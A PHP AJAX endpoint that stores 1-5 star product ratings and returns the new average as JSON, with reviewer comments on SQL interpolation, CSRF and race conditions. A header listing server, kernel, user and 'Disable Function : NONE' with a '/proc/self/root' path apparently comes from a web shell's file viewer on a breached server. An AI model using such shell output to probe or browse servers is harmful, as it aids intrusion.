

Server : Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.4.20
System : Linux st2.domain.com 3.10.0-1127.10.1.el7.x86_64 #1 SMP Wed Jun 3 14:28:03 UTC 2020 x86_64
User : apache ( 48)
PHP Version : 7.4.20
Disable Function : NONE
Directory :  /proc/self/root/var/www/html/tien-dien/code/ajax/


 

Current File : //proc/self/root/var/www/html/tien-dien/code/ajax/product_rating.php
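<?php
/**
 * AJAX endpoint: store or update a 1-5 star rating for a product and
 * reply with the product's new average and vote count as JSON.
 *
 * Reads `product_id` and `rating` from $CORE->input, the caller's address
 * from $CORE->ip, and (when set) the logged-in user from $ob_user.
 * Every path ends by echoing a JSON object with `status` and `message`.
 *
 * Security notes for reviewers:
 *  - All SQL in this file is built by string interpolation, so each
 *    interpolated value is forced to an integer or validated first.
 *    NOTE(review): if the $DB wrapper offers prepared statements or an
 *    escaping helper, prefer that over interpolation.
 *  - No CSRF token or rate limit is checked here; confirm whether the
 *    including framework enforces them before this file runs.
 */
global $DB, $CORE;

// Get input parameters; intval() guarantees the numeric values are safe to
// place inside the quoted SQL literals below.
$product_id = isset($CORE->input['product_id']) ? intval($CORE->input['product_id']) : 0;
$rating = isset($CORE->input['rating']) ? intval($CORE->input['rating']) : 0;
// NOTE(review): $ob_user is not listed in the `global` statement above. If this
// file is included from inside a function, $ob_user may be undefined here and
// every vote would be treated as anonymous - confirm against the includer.
$user_id = isset($ob_user->user_id) ? intval($ob_user->user_id) : null;

// Validate input
if ($product_id <= 0 || $rating < 1 || $rating > 5) {
    echo json_encode(['status' => 'error', 'message' => 'Invalid input parameters']);
    exit();
}

// Check if product exists
$product = $DB->fetch_row($DB->query("SELECT id FROM tb_product WHERE id='$product_id' AND status=0"));
if (!$product) {
    echo json_encode(['status' => 'error', 'message' => 'Product not found']);
    exit();
}

// Get user IP address.
// The address is interpolated into a SQL string for anonymous voters, and this
// file does not show how $CORE->ip is derived (it may come from a client-supplied
// header). Accept only a syntactically valid IPv4/IPv6 literal so that nothing
// else can reach the query.
$ip_address = filter_var($CORE->ip, FILTER_VALIDATE_IP);
if ($ip_address === false) {
    echo json_encode(['status' => 'error', 'message' => 'Invalid input parameters']);
    exit();
}

// Check if user has already rated this product (by IP if not logged in, or by user_id if logged in).
// NOTE(review): this is a check-then-write sequence; without a unique key on
// (product_id, user_id) / (product_id, ip_address) two concurrent requests could
// both insert - confirm the table schema.
if ($user_id) {
    $existing_rating = $DB->fetch_row($DB->query("SELECT rating_id FROM tb_product_ratings WHERE product_id='$product_id' AND user_id='$user_id'"));
} else {
    $existing_rating = $DB->fetch_row($DB->query("SELECT rating_id FROM tb_product_ratings WHERE product_id='$product_id' AND ip_address='$ip_address' AND user_id IS NULL"));
}

// Prepare data for database
$data = [
    'product_id' => $product_id,
    'rating' => $rating,
    'ip_address' => $ip_address,
    'created_at' => date('Y-m-d H:i:s')
];

// user_id is only stored for logged-in users; anonymous rows keep it NULL,
// which is what the IP-based lookup above filters on.
if ($user_id) {
    $data['user_id'] = $user_id;
}

// Insert or update rating
if ($existing_rating) {
    // Update existing rating; rating_id comes from the row fetched above,
    // not from the request.
    $rating_id = $existing_rating['rating_id'];
    $DB->query("UPDATE tb_product_ratings SET rating='$rating' WHERE rating_id='$rating_id'");
    $message = 'Rating updated successfully';
} else {
    // Insert new rating
    // NOTE(review): presumably do_insert() escapes the values it is given - verify.
    $DB->do_insert('tb_product_ratings', $data);
    $message = 'Rating submitted successfully';
}

// Get average rating for the product
$avg_rating = $DB->fetch_row($DB->query("SELECT AVG(rating) as average, COUNT(*) as count FROM tb_product_ratings WHERE product_id='$product_id'"));

// Return success response with average rating.
// The explicit float cast keeps round() from receiving a string or null
// straight from the database row.
echo json_encode([
    'status' => 'success',
    'message' => $message,
    'average' => round((float) $avg_rating['average'], 1),
    'count' => $avg_rating['count']
]);

$DB->free_result();
exit();
?>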
